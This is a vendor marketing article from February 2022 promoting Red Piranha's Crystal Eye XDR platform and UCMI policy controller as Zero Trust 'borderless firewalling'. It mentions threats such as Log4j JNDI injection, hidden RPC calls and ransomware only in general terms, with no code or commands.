Borderless Firewalling

Today’s networks are increasingly abstracted from the fibre and copper they run on. What constitutes a corporate network is no longer the buildings they reside in, nor the number of remote workers that connect daily. Network traffic is evolving to become processed as streaming workflow, and any given activity has numerous tributaries that flow along ever more complex pathways. Microservices for example, are software functions that aggregate to form the service that is presented to the user. What looks like old code, is in fact many different components working from without the traditional network perimeter. What was once a picture of a Medieval castle, with workers coming and going through gatehouses, has merged into a surrealist overlay of bodies and places. The problem this presents though is not that there is too much information to decode the traffic, the problem is that the traffic has different modes in which it can traverse a network. Linear rules that determine who-goes-there, can’t keep pace with the great many assassins in shepherd’s clothing.

So as perimeter-based security depreciates a new geography of Zero Trust emerges. Ingress from anywhere, and egress to anywhere, passes through this space, which is a security defined control plane abstracted from network traffic. Filtering at the perimeter now involves algorithms that oversee a lake of data. This way, policy administration is brought as close to the action as possible. With Crystal Eye (CE) solutions, workflow is traced, marked and checked against entity behaviour analytics, the integrated risk registry and policies, as well as dynamic policy resulting from threat intelligence. At the data plane, over thirty-two hundred protocols can be processed out-of-the-box, while customisable protocol parsing supports bespoke Industrial Control Systems (ICS), including SCADA, and other IoT devices. This gives granular, but also contextual control over authentication and authorisation so that both human and non-human subjects receive least privileges on a per-transaction basis.

Borderless Firewalling then, takes place at enforcement points, be they clients or servers, network gateways, or cloud brokering points. The CE Attack Surface Reduction app (CEASR) is an example of a host-based point at which Zero Trust policy is enforced. While the CE XDR Security Platform extends firewalling to on-premises gateways, cloud-native gateways, and brokering points. Network segmentation also creates enforcement points between zones, and when interconnected by an SD-WAN, the use of new protocols like WireGuard as a Software Defined Perimeter (SDP) controller, provides hybrid architecture access to brokered resources rather than directly joining networks. Without embracing the Zero Trust paradigm, Next-Generation firewalls are as dead as disco. Many require add-ons to do so, but as a module within the Security Platform, the CE firewall achieves borderless latitude outright with its proprietary UCMI technology, as policy enforcement, the act of firewalling, will need to continue doing so around more and more corners.

Meanwhile, wayward activities within the data lake are what attract alerts, as coastguard like policy administration inspects session-specific tokens permitting passage. The wrong payload, flag, or heading will impound traffic at an enforcement point. With the appropriate Security Platform, vulnerabilities like Log4j are not as easily exploited. Injected JNDI lookups would never reach attacker-controlled servers to retrieve malicious subroutines. What would otherwise have been a trusted service can no longer further the installation and backdoor phases of the kill chain.

The challenge for detecting incursions though are as they ever were. Logs and traffic can still be disguised. Which is why extended detection inputs that form a policy engine must be unified. Red Piranha’s proprietary UCMI policy controller achieves this as the central hub that corelates forensic evidence ingested by continuous diagnostics systems. Indicators of Compromise (IOCs) are analysed against Tactics, Techniques, and Procedures (TTPs), as well as User and Entity Behaviour Analytics (UEBA) to produce a complex security mesh that tracks distributed workflow. What this means is that there are checks and balances applied to the bureaucracy that is the network-aware systems of today.

As a fundamental function of this apparatus, Remote Procedure Calls (RPCs) follow protocols that facilitate the execution of routines on remote systems. Yet these requests between machines are effectively disguised by stub compliers that unpackage arguments parsed by the remote system. That system then is unaware, and logs activity as its own. This missing trace at end points is compounded when RPC calls are hidden within the payload of other protocols, like named pipes that carry common traffic, or are obfuscated and delivered out of order. So, to catch this activity, multiple points of detection are required. Verifying identity and access becomes more about whether the activity is typical and what supports that conclusion. Activity is checked against known techniques, as well as indicators like compromised addresses, domains and file hashes. Correlation occurs across the entire lake of activity and not just what is evident in a single transaction.

Spotting calls to ransomware command servers will prevent obtaining the private keys they need to hold data hostage. But, when private keys are symmetrically encrypted and smuggled in the original delivery, Zero Trust must be applied to prevent lateral movement and privilege escalation spreading from within. This can be implemented with Crystal Eye advanced firewall capabilities with UCMI and hosts and zones linked to end users. Halting incursions at that initial attack vector is crucial to countermeasures in an open field ungoverned by perimeter rules. The ability to materialise at key locations is Borderless Firewalling. This requires continuous detection across the entire lake of data that extends to the entire security mesh. With the CE XDR Security Platform and smart SOC (SOC as a service) in place, the necessary intelligence can be passed to the CE firewall at wire speed, turning a lowly grunt in the hierarchy of threat detection into that unsung responder who saves the day.

Date Published
February 28, 2022